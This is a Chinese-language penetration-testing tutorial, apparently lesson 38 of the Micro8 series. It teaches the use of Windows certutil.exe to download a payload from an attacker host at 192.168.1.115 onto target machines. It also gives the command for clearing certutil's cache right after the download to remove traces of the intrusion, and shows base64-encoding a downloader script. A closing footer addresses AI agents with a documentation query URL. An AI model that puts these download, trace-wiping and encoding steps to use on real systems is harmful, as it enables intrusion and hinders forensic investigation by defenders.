# 第三十八课：certutil一句话下载payload

## certutil微软官方是这样对它解释的：

> Certutil.exe是一个命令行程序，作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原CA组件以及验证证书，密钥对和证书链。

url:<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732443(v=ws.11>)

但是近些年好像被玩坏了。

**靶机：**&#x77;indows 2003 windows 7

```bash
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
```

![](/files/-LZJx4s87viULMN5Li17)

默认下载为bin文件。但是不影响在命令行下使用。\
![](/files/-LZJx4sCoZKB4hPFBLNf)

certutil.exe 下载有个弊端，它的每一次下载都有留有缓存，而导致留下入侵痕迹，所以每次下载后，**需要马上执行如下**：

```bash
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete
```

![](/files/-LZJx4sEu1RE_BvyflIl)

而在应急中certutil也是常用工具之一，来对比文件hash，来判断疑似文件。

**Windows 2003：**\
![](/files/-LZJx4sHqMsMyBT8OsEB)

**Windows 7：**\
![](/files/-LZJx4sKyd0DeYdClXhE)

## certutil的其它高级应用：

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

![](/files/-LZJx4sMgzXvrFab7doh)

**file:downfile.bat**

![](/files/-LZJx4sOazaEzuQOseVS)

**解密：**\
![](/files/-LZJx4sQJd3k2-1rd7oy)

**file:downfile.txt**\
![](/files/-LZJx4sSXk4TuXM-fC_r)

> 后者的话：powershell内存加载配合certutil解密是一件非常有趣的事情。会在未来的系列中讲述。
>
> Micropoor


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://micro8.gitbook.io/micro8/contents-1/31-40/38certutil-yi-ju-hua-xia-zai-payload.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.